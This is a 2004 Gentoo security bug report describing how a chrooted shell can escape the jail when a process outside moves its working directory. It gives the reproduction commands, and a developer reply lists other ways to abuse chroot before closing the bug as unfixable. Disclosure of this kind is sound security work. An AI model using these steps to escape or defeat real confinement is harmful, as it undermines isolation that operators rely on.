Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!

Bug 48872

Summary: Escaping from chroot with help from outside by moving out current working directory
Product: Gentoo Security Reporter: Tim Weber <scy-bugs-gentoo>
Component: VulnerabilitiesAssignee: Gentoo Security <security>
Status: RESOLVED CANTFIX    
Severity: major    
Priority: High    
Version: unspecified   
Hardware: All   
OS: Linux   
Whiteboard:
Package list:
Runtime testing required: ---

Description Tim Weber 2004-04-24 05:13:38 UTC
It looks to me that it is possible to escape from a chroot jail with help from outside. Specifically, when someone not inside the chroot moves out the current working directory of someone inside the chroot, the guy inside can use multiple "cd .."'s to finally get to the real root directory.

Reproducible: Always
Steps to Reproduce:
1. Create a directory called "/new" and copy a Gentoo stage1 tarball inside to make it somewhat usable. Create a directory called "/new.store"
2. Open up two root shells. (Maybe this works with user shells as well, didn't try it.)
3. Do the following commands in shell A:
serv0r root # cd / 
serv0r / # chroot /new /bin/bash 
serv0r / # cd usr 
serv0r usr # mkdir escape 
serv0r usr # cd escape
4. Do the following command in shell B:
serv0r root # mv /new/usr/escape /new.store/
5. Do the following commands in shell A:
serv0r escape # ls 
serv0r escape # pwd 
/usr/escape 
serv0r escape # cd .. 
serv0r new.store # ls 
escape  usr 
serv0r new.store # pwd 
/new.store
Actual Results:  
As you can see, the chrooted shell A can now access the directory 
"/new.store". By using "cd .." again he would be able to change to the real 
root directory, despite being chrooted to "/new". 

Expected Results:  
Either 
a) Disallow the "mv" of the current working directory of shell A's user or 
b) Put shell A's user inside "/usr" (which in fact is "/new/usr") after the 
"cd ..". 

I've posted this about one or two weeks ago in the forums 
(http://forums.gentoo.org/viewtopic.php?t=160772), but didn't have time to 
file a bug report. 
 
This has NOT been tested with up-to-date software, but was reproduced by 
forums moderator tomk, I guess he was using current packages. 
 
I was using chroot 5.0 (from coreutils-5.0-r5) and some older kernel (about 
2.4.22). Sorry I didn't check the precise kernel version, but I had very 
little time at that moment.
Comment 1 solar (RETIRED) gentoo-dev 2004-04-24 09:22:26 UTC
We can't fix this.
What your talking about goes into the fundamental design of the kernel.

Note; There are also other ways to abuse a default chroot setup that don't require
external forces to help you including iopl, shmat, ptrace, kill, mount, fchdir, 
AF_UNIX sockets, chmod, mknod.

Changing resolution to CANTFIX
If you feel that we can fix this somehow then please attach a patch and reopen.